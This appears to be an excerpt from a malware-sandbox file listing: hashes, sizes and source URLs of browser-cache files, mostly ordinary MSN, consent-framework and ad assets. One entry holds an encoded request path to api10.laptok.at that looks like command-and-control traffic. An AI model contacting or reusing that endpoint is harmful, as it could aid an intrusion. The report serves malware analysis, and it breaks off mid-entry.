                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7gRE[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):482
                                                                                Entropy (8bit):7.256101581196474
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
                                                                                MD5:307888C0F03ED874ED5C1D0988888311
                                                                                SHA1:D6FB271D70665455A0928A93D2ABD9D9C0F4E309
                                                                                SHA-256:D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
                                                                                SHA-512:6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7hg4[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):458
                                                                                Entropy (8bit):7.172312008412332
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
                                                                                MD5:A4F438CAD14E0E2CA9EEC23174BBD16A
                                                                                SHA1:41FC65053363E0EEE16DD286C60BEDE6698D96B3
                                                                                SHA-256:9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
                                                                                SHA-512:FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..*$Mf..j.*n.*~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T.*.Z_..'.}..rc....(...9V.&.....|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBIbTiS[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):820
                                                                                Entropy (8bit):7.627366937598049
                                                                                Encrypted:false
                                                                                SSDEEP:24:U/6gJ+qQtUHyxNAM43wuJFnFMDF3AJ12DG7:U/6gMqQtUSxNT43BFnsRACC
                                                                                MD5:9B7529DFB9B4E591338CBD595AD12FF7
                                                                                SHA1:0A127FA2778A1717D86358F59D9903836FCC602E
                                                                                SHA-256:F1A3EA0DF6939526DA1A6972FBFF8844C9AD8006DE61DD98A1D8A2FB52E1A25D
                                                                                SHA-512:4154EC25031ED6BD2A8473F3C3A3A92553853AD4DEFBD89DC4DD72546D8ACAF8369F0B63A91E66DC1665CE47EE58D9FDD2C4EEFCC61BF13C87402972811AB527
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbTiS.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.K.Q....m.[.L\.,%I*..S......^.^.z..^..{..-.Bz.....MA+...........{W....p.9..;.s....^..z..!...+..#....3.P..p.z5.~..x>.D.].h.~m..Z..c.5..n..w...S."..U.....X.o...;}.f..:.}]`..<S...7.P{k..T.*....K.._.E..%x.?eRp..{.....9.......,,..L.......... .......})..._ TM)..Z.mdQ.......sY .q..,.T1.y.,lJ.y...'?...H..Y...SB..2..b.v.ELp....~.u.S...."8..x1{O....U..Q...._.aO.KV.D\..H..G..#..G.@.u.......3...'...sXc.2s.D.B...^z....I....y...E..v.l.M0.&k`.g....C.`..*..Q..L.6.O&`.t@..|..7.$Zq...J.. X..ib?,.;&.....?..q.Q.,Bq.&......:#O....o..5.A.K..<..'.+.z...V...&. .......r...4t.......g......B.+-..L3....;ng>..}(.....y.....PP.-.q.....TB........|HR..w..-....F.....p...3.,..x..q..O..D......)..Vd.....IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBaK3KR[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):551
                                                                                Entropy (8bit):7.412246442354541
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/kF5ij6uepiHibgdj9hUxSzDLpJL8cs3NKH3bnc7z:WO65iHibeBQSvL7S3N03g
                                                                                MD5:5928F2F40E8032C27F5D77E3152A8362
                                                                                SHA1:22744343D40A5AF7EA9A341E2E98D417B32ABBE9
                                                                                SHA-256:5AF55E02633880E0C2F49AFAD213D0004D335FF6CB78CAD33FCE4643AF79AD24
                                                                                SHA-512:364F9726189A88010317F82A7266A7BB70AA97C85E46D15D245D99C7C97DB69399DC0137F524AE5B754142CCCBD3ACB6070CAFD4EC778DC6E6743332BDA7C7B1
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBaK3KR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O..9,.q..:&.E..#.,B".D.Zll..q,H.......DH..X5.@....P!.#......m?...~C....}......M\.....hb.G=..}.N..b.LYz.b.%.>..}...]..o$..2(.OF_..O./...pxt%...................S.mf..4..p~y...#:2.C......b.........a.M\S.!O.Xi.2.....DC... e7v.$.P[....l..Gc..OD...z..+u...2a%.e.....J.>..s.............]..O..RC....>....&.@.9N.r...p.$..=.d|fG%&..f...kuy]7....~@eI.R....>.......DX.5.&..,V;.[..W.rQA.z.r.].......%N>\..X.e.n.^&.ij...{.W....T.......IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\de-ch[1].json
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):76785
                                                                                Entropy (8bit):5.343242780960818
                                                                                Encrypted:false
                                                                                SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCFPQtihPxVUYUEJ0YAtF:olLEJxa4CmdiuWloIti1wYm7B
                                                                                MD5:DBACAF93F0795EB6276D58CC311C1E8F
                                                                                SHA1:4667F15EAB575E663D1E70C0D14FE2163A84981D
                                                                                SHA-256:51D30486C1FE33A38A654C31EDB529A36338FBDFA53D9F238DCCB24FF42F75AF
                                                                                SHA-512:CFC1986EF5C82A9EA3DCD22460351DA10CF17BA6CDC1EE8014AAA8E2A255C66BB840B0A5CC91E0EB42E6FE50EC0E2514A679EA960C827D7C8C9F891E55908387
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
                                                                                Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\ha[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):2464
                                                                                Entropy (8bit):5.985101502504591
                                                                                Encrypted:false
                                                                                SSDEEP:48:IwgrwffRMN+4xpihcoAtmdydQ+nR4z3Swa0FUBmmX3Aw6Ixt6iMibzuM8WyVN:Iwgk3RFutmKQi4r1kHAwjxpV2M8L
                                                                                MD5:A214C9D621F37A4A5DD418FE4B986283
                                                                                SHA1:96B4D5DED9599F50A7557A927384A054721496C6
                                                                                SHA-256:A63A214D997D6A6B91E278F99EE16E9EDD06ABC4C515797838E22B8E59C96784
                                                                                SHA-512:9D7F21113869653138AF6DE31ED741CC17EA7C5FD0EA2540290AB31B1730E77D0226C0565328466B7A578074F4793EAE14E881E69D7C2F8D5D354A130E97779E
                                                                                Malicious:false
                                                                                IE Cache URL:http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_1922f0dc8699bf8edcf7c727cbc43d75[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):33654
                                                                                Entropy (8bit):7.93677204324885
                                                                                Encrypted:false
                                                                                SSDEEP:768:BYyF/HAL/a8mvWHUHD1aJ1izFi/1kp99ssSdA:BxE/We0HD148j
                                                                                MD5:C63DABAF54A1E9D41C87A8D67E56D68A
                                                                                SHA1:C07BF0B5ED6DE22AC372782599D8A7ED74F82348
                                                                                SHA-256:2C676E5170D304519ED2F955C9F14B8D5D2535642A5A447A54FCCFE91C8AF80F
                                                                                SHA-512:47FD83E49A1D35C83D02B649D539B4B0D36A72E3B0586FBCDA9460AA1FB533A719983998C75B9EDF2E261563E47CA702A793801037EF207DDA5F3982CBA45107
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F1922f0dc8699bf8edcf7c727cbc43d75.jpg
                                                                                Preview: ......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_e422867e373581902d24ef95be7d4e1b[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):7445
                                                                                Entropy (8bit):7.93831956568165
                                                                                Encrypted:false
                                                                                SSDEEP:192:6Lj959JigoMQOL8q6TkMlYo6UsZlwtrGDWTInXeGcCS:6Lj/9Jdk+Ml76h2Kk
                                                                                MD5:C4B9684545B9781F5F19A99ECD6A95B5
                                                                                SHA1:C25C9E466C46184BE03D654BF13DED7D55E71C1B
                                                                                SHA-256:845E13CB4404F674F57C712D570BC9E353A2CB742722DA9116F272B9226C71F7
                                                                                SHA-512:1E0B379E40FB2099462BC75C653217469071D59408F9030E4255E65765140C7762F2332CE3FD78E18337EBCB0A95E729AB2C71A79B2761DE8C8700FA6455172E
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fe422867e373581902d24ef95be7d4e1b.jpg
                                                                                Preview: ......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........4.................................................................(..{P....>.#.....M..N+EF..*.=U.W.'.).0..(.ipG..u.K..JP..C.....[.%.p......My<$q..LI!......k..B .j$6..J...$V<.)rY.).....KK r&.&.+...I..@4..".-.h5s..X.9gJ...D..[........`./.rsn..'C.r|b..2^.m.V{.B.&./H....%..&..p>m.X.O..._`..'~.b/H....{.0.qcS.P.....R.]x.......zW.h.+.~.T..@..o..;.+..F....J.4.p......>..Q.U...L.p...v...&.e.D..R5*P.y.4K}.m.X.HK.. ..y.h.3eiP...h.[..u.,..B.1..c..$.(.*5Fn..5...j.;..I..k.j.......q....J.G.......g...H.J3b.I..@LJd.....g.9x<AgB._W..b.d.K..}.0..;^.hw.r...".....}..?...,......~.9..]....t...`"._P.D>M.[o.@...:.....n..]..Z...%?N...i?u../"..&.V.W0u..=.v.H.. ......6...7.?b.e}...!.......@..b.....G.t.......9...r...6..[..)......l[..m.}...Y)7.-.3..p.;......+..T*..S...5V..e....SE.V..M&..{.....
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\iab2Data[1].json
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):230026
                                                                                Entropy (8bit):5.150044456837813
                                                                                Encrypted:false
                                                                                SSDEEP:768:l3JqIWtk5N1cfkCHGd5btLkWUuSKQlqmPTZ1j5sIbUkjsyYAAA:l3JqIGk5Med5btLksSKkPnjNjh4A
                                                                                MD5:6AAA0F3074990A455B222A4D044E2346
                                                                                SHA1:6443AF82ED596527261B0F4367A67DD4D1BA855B
                                                                                SHA-256:1232E273F047113AB950CC141FC73D50640D2352B2ED16B89A1BAC01A80BEBEC
                                                                                SHA-512:EDE13CDE1DDEB45CD038042DCC6C1F75664EC259BC44100EB9C36361CFB657A7A661901DFEAD44DF6CEC555406A221970DF10F562AE222226546B7EFCE8E6E8D
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
                                                                                Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nrrV67478[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):88164
                                                                                Entropy (8bit):5.423101112677061
                                                                                Encrypted:false
                                                                                SSDEEP:1536:DVnCuukXGsQihGZFu94xdV2E4q35nJy0ukWaaCUFP+i/TX6Y+fj4/fhAaTZae:DQiYpdVGetuVLKY+fjwZ
                                                                                MD5:C2DC0FFE06279ECC59ACBC92A443FFD4
                                                                                SHA1:C271908D08B13E08BFD5106EE9F4E6487A3CDEC4
                                                                                SHA-256:51A34C46160A51FB0EAB510A83D06AA9F593C8BEB83099D066924EAC4E4160BC
                                                                                SHA-512:6B9EB80BD6BC121F4B8E23FC74FD21C81430EE10B39B1EDBDEFF29C04A3116EB12FC2CC633A5FF4C948C16FEF9CD258E0ED0743D3D9CB0EE78A253B6F5CBE05D
                                                                                Malicious:false
                                                                                IE Cache URL:https://contextual.media.net/48/nrrV67478.js
                                                                                Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otPcCenter[1].json
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):46394
                                                                                Entropy (8bit):5.58113620851811
                                                                                Encrypted:false
                                                                                SSDEEP:384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
                                                                                MD5:145CAF593D1A355E3ECD5450B51B1527
                                                                                SHA1:18F98698FC79BA278C4853D0DF2AEE80F61E15A2
                                                                                SHA-256:0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
                                                                                SHA-512:D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
                                                                                Preview: .. {.. "name": "otPcCenter",.. "html": "
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otTCF-ie[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):102879
                                                                                Entropy (8bit):5.311489377663803
                                                                                Encrypted:false
                                                                                SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
                                                                                Preview: !function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\58-acd805-185735b[1].css
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):248287
                                                                                Entropy (8bit):5.297047810331843
                                                                                Encrypted:false
                                                                                SSDEEP:3072:jaBMUzTAHEkm8OUdvUvbZkrlx6pjp4tQH:ja+UzTAHLOUdvUZkrlx6pjp4tQH
                                                                                MD5:A0AB539081F4353D0F375D2C81113BF3
                                                                                SHA1:8052F4711131B349AC5261304ED9101D1BAD1D0A
                                                                                SHA-256:2B669B3829A6FF3B059BA82D520E6CBD635A3FBA31CDC7760664C9F2E1A154B0
                                                                                SHA-512:6FA44FDC9FAE457A24AB2CEAB959945F1105CF32D73100EBE6F9F14733100B7AACDD7CA0992DE4FFA832A2CBCD06976F9D666F40545B92462CC101ECDB72685E
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\85-0f8009-68ddb2ab[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):391843
                                                                                Entropy (8bit):5.323521567582823
                                                                                Encrypted:false
                                                                                SSDEEP:6144:Rrf9z/Y7Sg/FDMxqkhmnid1WPqIjHSjae1dWgxO0Dvq4FcG6Ix2K:dJ/Ynznid1WPqIjHdYltHcGB3
                                                                                MD5:CDD6C5E31F58A546B6F9637389B2503B
                                                                                SHA1:0ADA1E1C82B8E7636F6DAF4CE78D571C80A3E81A
                                                                                SHA-256:4CC5BC89E9F4E54FE905AB22340FA3793FE04F30453DC17CE2780D61DB35D5D4
                                                                                SHA-512:11FD84FE2EAB4FFEBAF45D8D509E7E8E927540A3D67CCADB65AB7C7A7F22F1922411A02157B404D2CA652D6AEF8809B659C0D4106F2F57B6B02911D85B06A4DB
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAkqhIf[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):860
                                                                                Entropy (8bit):7.60890282381101
                                                                                Encrypted:false
                                                                                SSDEEP:24:K0TOJV9BOYAz7M84tQIe4scs41PjgcpT2MIcTuNN:KYGVrnS7MXtV91PTgxcTuNN
                                                                                MD5:BB846CCC67B5DE204B33CF7B805F59A3
                                                                                SHA1:A3301490722FA557F169FAA8283DA926F4393783
                                                                                SHA-256:9913B44FB1AAF52B9CB0BD7BB4563CAA098BC29D35E2609D4E2A74C4D4026131
                                                                                SHA-512:6686582817EB71206178595C9051087412499F7110B1FFE13D8C2E517EC16C7B6B6A1728B546F2EBEE80D0D1388E64FFBE97A628DD7C4B24DD30274AAB7E3D41
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAkqhIf.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB17milU[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):627
                                                                                Entropy (8bit):7.4822519699232695
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/W/6TiIP7X0TFI8uqNN9pEsGCLDOk32Se5R2bBCEYPk79kje77N:U/6xPT0TtNNDGCLDOMVe5JEAkv3N
                                                                                MD5:DDE867EA1D9D8587449D8FA9CBA6CB71
                                                                                SHA1:1A8B95E13686068DD73FDCDD8D9B48C640A310C4
                                                                                SHA-256:3D5AD319A63BCC4CD963BDDCF0E6A629A40CC45A9FB14DEFBB3F85A17FCC20B2
                                                                                SHA-512:83E4858E9B90B4214CDA0478C7A413123402AD53C1539F101A094B24C529FB9BFF279EEFC170DA2F1EE687FEF1BC97714A26F30719F271F12B8A5FA401732847
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1dH8OJ[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):5977
                                                                                Entropy (8bit):7.888120339421369
                                                                                Encrypted:false
                                                                                SSDEEP:96:xGAaEsbIRtGwanIkO5in5o/Z8vkVyyURPLviACTppYt82vnLeiMyuF59iN8F29SU:xCZbQ8vnIkORZ8vkVy9RDiAC8txLjk4v
                                                                                MD5:6B4A50D78C876AA0E985EE05096F8803
                                                                                SHA1:3AD0DCB44FBB4CD693C49B969E2AA9C7FFA85D5C
                                                                                SHA-256:35A290B70BEF0733752F699867D3C690866D7421CBB268285A5784521909326E
                                                                                SHA-512:E23AB9438C23594A2ED9DBAA0157C091C6EFCAE3ED06F689B6AD45878B4F46710001C26297C544149DE7F800B447986AFF2C3432DFDEEAD2BEABAE0254FB3630
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dH8OJ.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1dHBnn[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):6436
                                                                                Entropy (8bit):7.914696570266268
                                                                                Encrypted:false
